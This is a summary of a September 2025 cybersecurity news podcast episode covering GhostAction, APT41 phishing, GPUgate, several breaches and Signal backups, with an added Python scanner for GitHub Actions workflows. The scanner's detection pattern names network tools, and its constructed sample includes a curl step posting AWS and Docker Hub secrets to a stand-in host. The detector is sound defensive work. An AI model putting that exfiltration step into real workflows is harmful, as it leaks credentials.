Cyber Security Headlines – September 9, 2025
Podcast: Cyber Security Headlines
Host: Rich Stroffolino, CISO Series
Main Theme:
A fast-paced overview of the top stories in information security, highlighting major breaches, novel cybercrime campaigns, new vulnerabilities, and trends impacting the tech and legal sectors.
Key Discussion Points & Insights
1. GhostAction Campaign Targets GitHub
[00:07–01:15]
- Incident Overview: GitGuardian discovered that their internal FastUUID GitHub project was compromised. The attackers enumerated the secret names referenced in the project's workflow files and hardcoded those names into injected workflows, exposing the secret values.
- Scope: The wider campaign, dubbed "GhostAction", affected 327 GitHub users and 817 repositories, leaking over 3,300 secrets including AWS instances, Docker Hub, and npm tokens.
- Response: GitGuardian notified security teams at GitHub, PyPI, and npm; many repositories were already reverted to mitigate the leak.
Memorable Quote:
“This campaign leaked over 3,300 secrets, including AWS instances, Docker Hub tokens and npm tokens.”
— Rich Stroffolino, [00:45]
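As an added defender-side illustration (not code from the podcast, GitGuardian or GitHub), the heuristic below scans a GitHub Actions workflow for `run:` steps that both reference `${{ secrets.* }}` and call out to a host outside GitHub, the pattern by which injected workflows like GhostAction's expose token values. The sample workflow, the thresholds and the `collector.example.invalid` host are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed heuristics for this example; not GitGuardian's or GitHub's detection logic.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
URL_RE = re.compile(r"https?://[^\s\"'`)]+")
NET_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc|ncat)\b")
# `run:` key (group 1 = indent), then either a |/> block scalar body (group 2) or an inline script (group 3)
RUN_RE = re.compile(
    r"^([ \t]*)(?:-[ \t]+)?run:[ \t]*(?:[|>]-?[ \t]*\n((?:\1[ \t]+.*(?:\n|$))+)|(.*))", re.M)
TRUSTED = ("github.com", "githubusercontent.com")  # hosts a run step may legitimately call
ENUM_THRESHOLD = 5  # assumed: one step referencing this many secrets looks like enumeration


def _trusted(host):
    return any(host == t or host.endswith("." + t) for t in TRUSTED)


def scan_workflow(text):
    """Return (line, reason, secrets, external_hosts) for every suspicious run step."""
    findings = []
    for m in RUN_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        script = m.group(2) or m.group(3) or ""
        secrets = sorted(set(SECRET_REF.findall(script)))
        hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(script)]
        external = [h for h in hosts if not _trusted(h)]
        if secrets and external and NET_TOOL.search(script):
            findings.append((line_no, "secrets sent to external host", secrets, external))
        elif len(secrets) >= ENUM_THRESHOLD:
            findings.append((line_no, "unusually many secrets in one step", secrets, []))
    return findings


# Constructed sample: a benign publish step followed by a step that posts secrets off-platform.
SAMPLE_WORKFLOW = """\
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - run: |
          curl -s -X POST https://collector.example.invalid/upload \\
            -d "aws=${{ secrets.AWS_SECRET_ACCESS_KEY }}" \\
            -d "docker=${{ secrets.DOCKERHUB_TOKEN }}"
"""

if __name__ == "__main__":
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

Secrets mapped into `env:` and then read as plain shell variables are not caught by this text-level check, so treat it as a triage aid for reviewing workflow changes, not a complete control.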
2. Industrial-scale Scam Centers Proliferate in Myanmar
[01:16–01:43]
- Scale & Location: New research and drone footage reveal that scam call centers on the Thai-Myanmar border have more than doubled since the 2021 military coup.
- Construction Rate: New criminal compounds are being built at a staggering rate of 55 hectares per month.
- Human Trafficking: Thai police estimate at least 100,000 individuals are trafficked into these centers, lured by false job promises.
- Criminal Innovation: Fortified centers include luxury accommodations for management, serving as “social proof” for various investment scams.
Quote:
“These elaborate facilities are heavily fortified and contain luxury housing for management as well as serving as social proof for investment scams.”
— [01:38]
3. Chinese APT41 Impersonates US Lawmaker in Cyber-espionage Campaign
[01:44–02:20]
- Attack Method: APT41 (a Chinese state-backed advanced persistent threat group) ran an email campaign posing as U.S. Congressman John Moolenaar, targeting trade groups, U.S. government agencies and law firms.
- Malware Delivery: The phishing emails included attachments appearing to be draft legislation, designed to prompt user interaction and install a backdoor.
- Context: Occurred at the onset of US–China trade talks in Sweden.
Quote:
“An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor.”
— [02:08]
4. ‘GPUgate’: New Malvertising Tactic Targets IT Firms
[02:21–03:07]
- Attack Mechanism: Dubbed 'GPUgate', the campaign uses paid ads in search results containing GitHub commit URLs leading to malicious downloads.
- Technical Innovation: The malware’s payload is locked behind a “GPU-gated decryption routine”—if the system lacks a GPU (as is typical in sandboxes or VMs), the malware remains encrypted, evading analysis.
- Target Profile: Exclusively targets IT and software development companies in Western Europe; operators speak Russian.
Quote:
“This would stymie analysis of the malware on a virtual machine or other sandbox that doesn’t typically have GPU resources.”
— [02:49]
5. iCloud Calendar Used for Advanced Phishing Scheme
[03:50–04:28]
- Phishing Details: Scammers sent fake PayPal billing notices via iCloud Calendar events to a Microsoft 365 mailing list.
- Technique: The phishing approach successfully passed SPF, DMARC, and DKIM checks, raising the stakes for anti-phishing defenses.
Quote:
“While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC and DKIM email security checks.”
— [04:23]
6. Wealthsimple Data Breach Impacts 1% of Customers
[04:29–04:52]
- Scope: Fintech firm Wealthsimple confirmed a breach exposing government IDs, SINs (Social Insurance Numbers), and account numbers of 30,000 clients (under 1% of its customer base).
- Cause: The breach stemmed from a compromised third-party provider; it was identified on August 30th, and affected customers were notified by September 5th.
- Remediation: Two years of credit and dark web monitoring offered; customers urged to enable two-factor authentication.
7. PACER Struggles with Multi-Factor Authentication Rollout
[04:53–05:28]
- System: PACER, the US federal courts' electronic case file access system, is trying to enforce MFA for document filers and case managers.
- Problems: Enrollment freeze-ups, overwhelmed support lines, and long wait times prompted a delay from a hard deadline to a phased rollout.
- Advice: Users should wait to enroll until the system prompts them.
8. Signal Launches Encrypted Chat Backup with Paid Option
[05:29–06:16]
- Feature: Signal introduces beta chat backup for Android: free for basic usage (100MB of chat, 45 days of media), with a paid plan ($1.99/month) for up to 100GB.
- Privacy: Backups are encrypted with a 64-character key generated on-device; backups are not linked to user identity or payment info.
- Significance: This is Signal’s first paid feature, previously funded solely by donations; iOS support coming soon.
Additional Segments
- Editorial Note: The show highlights an episode tackling the perennial gap between security “prevention” advice and workplace adoption, with the tongue-in-cheek title: “We all agree that prevention is the best advice we’re never going to follow.” — [06:47]
- Community Engagement: Listeners are encouraged to send feedback to the show, which “reads everything that you send us and we love to hear from you.” — Rich Stroffolino, [07:02]
Conclusion
This episode provides a succinct but comprehensive sweep of major infosec stories—from elite cyber-espionage and creative malware distribution to practical security headaches for end users and institutions. The recurring message: threats are evolving, prevention is complex, and community awareness is critical.
